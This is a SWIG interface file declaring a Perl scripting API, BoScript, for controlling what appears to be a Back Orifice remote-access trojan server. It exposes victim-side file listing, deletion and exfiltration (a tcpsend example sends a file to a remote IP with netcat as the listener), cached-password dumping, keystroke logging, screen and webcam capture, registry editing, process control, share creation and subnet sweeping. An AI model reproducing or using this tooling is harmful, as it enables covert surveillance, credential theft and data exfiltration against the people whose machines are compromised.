/* boscript.i */

%title "BoScript"
%{
/* header files */

%}


%section "Utility Functions"
extern int initialize();
  /* Call this function before calling any other boscript functions */
extern int set_host(char *hostname);
  /* where hostname can be the name of a host or an IP address.
     This function must be called before any other functions that access
     a BO Server. */
extern int set_port(int portnum);
  /* Set the port to access on the BO Server. If uncalled before accessing
     a server or sweeping, the default (31337) will be used. */
extern int set_password(char *password);
  /* Set the encryption password to 'password'.  If uncalled, the default
     of no password is used. */
extern char* get_password();
  /* Report back currently set encryption password.  One of the few functions
     that does not return a success/failure int. */
extern int set_verbose();
  /* Turn on program verbosity.  Status updates and useless messages will
     be pumped to stdout.  Verbosity is off by default. */
extern int unset_verbose();
  /* Unset program verbosity.  This is the default, so this function is only
     needed if verbosity had been previously enabled. */
extern char* gettext();
  /* All functions that access the BO Server return one or more text lines
     as results to convey information or indicate success/failure of the
     command on the server side.  This function returns a perl string
     containing all lines output from the Server from the last command sent.
     The script is expected to parse this lines to determine the success or
     failure of commands. (this may change in a future version).
     Multiline outputs are given as one long string, and can be divided into
     individual lines with the perl 'split' function. */
extern char* raise_timeout(int time_out);
  /* Will change to timeout value for commands to 'time_out' for only
     the next issued command.  This is useful for long running commands
     such as 'find'. */

%section "File Functions"
  /* All File functions that accept a filename or path for a parameter
     expect the full path (including drive letter) with the short (DOS)
     filenames (eg. 'PROGRA~1' instead of 'Program Files').  Also, backslashes
     must be escaped. */
extern int ls(char *dir);
  /* List files.  The full path and wildcard specifier must be passed as the
     dir argument.  Short filenames must be given, as opposed to long
     ones.  Example:
     boscript::ls("c:\\progra~1\*"); */
extern int rm(char *filename);
  /* Remove file.  */
extern int cp(char *src, char *dst);
  /* Copy file from file1 to file2. */
extern int ren(char *file1, char *file2);
  /* Rename file1 to file2.  Full path expected. */
extern int find(char *filename, char *path);
  /* Find the file specified by 'filename', searching all subdirectories
     underneath 'path'.  Wildcards are allowed.  Example:
     boscript::find("*.dll", "c:\\windows"); */
extern int md(char *dir);
  /* Make directory. */
extern int rd(char *dir);
  /* Remove directory */
extern int freeze(char *src, char *dst);
  /* Freeze (compress) a file. */
extern int melt(char *src, char *dst);
  /* Melt (uncompress) a file */
extern int fileview(char *filename);
  /* View a text file */
extern int tcpsend(char *filename, char *ip_port);
  /* Send the file 'filename' to the IP address and port given by 'ip_port'.
     Example:
     boscript::tcpsend("c:\\autoexec.bat", "192.168.0.52:85");
     would send the autoexec file to host 192.168.0.52 on port 85.
     Programs such as 'netcat' cat listen and receive files sent this way. */
extern int tcprecv(char *filename, char *ip_port);
  /* Connect to the IP address and port given by 'ip_port' and receive the
     file that is sent over that connection.  The file will be saved as
     'filename' */
     
%section "Network Functions"
extern int netview();
extern int netlist();
extern int netconnect(char *resource);
extern int netdisconnect(char *resource);
extern int resolve(char *hostname);
extern int sharelist();
extern int shareadd(char *sharename, char *path);
extern int sharedel(char *sharename);
extern int redirlist();
extern int rediradd(char *input_port, char *dest_ip);
extern int redirdel(char *redir_id);

%section "Registry Functions"
extern int reglistkeys(char *keyname);
extern int regmakekey(char *keyname);
extern int regdelkey(char *keyname);
extern int reglistvals(char *keyname);
extern int regsetval(char *valuename, char *data);
extern int regdelval(char *valuename);

%section "Process Functions"
extern int proclist();
extern int prockill(char *proc_id);
  /* Kill the process defined by 'proc_id'.  Process id's may be determined
     from the output of the 'proclist()' command. */
extern int procspawn(char *cmdline);

%section "Console Program Functions"
extern int applist();
extern int appadd(char *exename, char *inputport);
extern int appdel(char *app_id);

%section "Plugin Functions"
extern int pluginlist();
extern int pluginexec(char *plugin, char *plugin_args);
extern int pluginkill(char *plugin_id);

%section "Multimedia Functions"
extern int listcaps();
extern int capframe(char *filename, char *devicespec);
extern int capavi(char *filename, char *devicespec);
extern int capscreen(char *filename);
extern int sound(char *filename);

%section "Web Server Functions"
extern int httpon(char *httpport, char *path);
extern int httpoff();

%section "Miscellaneous Functions"
extern int ping();
extern int sweep(char *subnet);
  /* Sweep a subnet.  Will return a 0 if any of the pings are returned and
     return a 1 if the sweep was unsuccessful.  A call to gettext() can
     then determine which IP's answered. */
extern int sysinfo();
extern int passes();
  /* List passwords cached in the remote system's memory.  Garbage may be
     appended to the end of the line. */
extern int dialog(char *message, char *title);
extern int reboot();
extern int lockup();
extern int logkeys(char *filename);
  /* Log all keystrokes to 'filename'.  Sending the string 'STOP' as the
     filename will cause the server to stop logging keystrokes. */


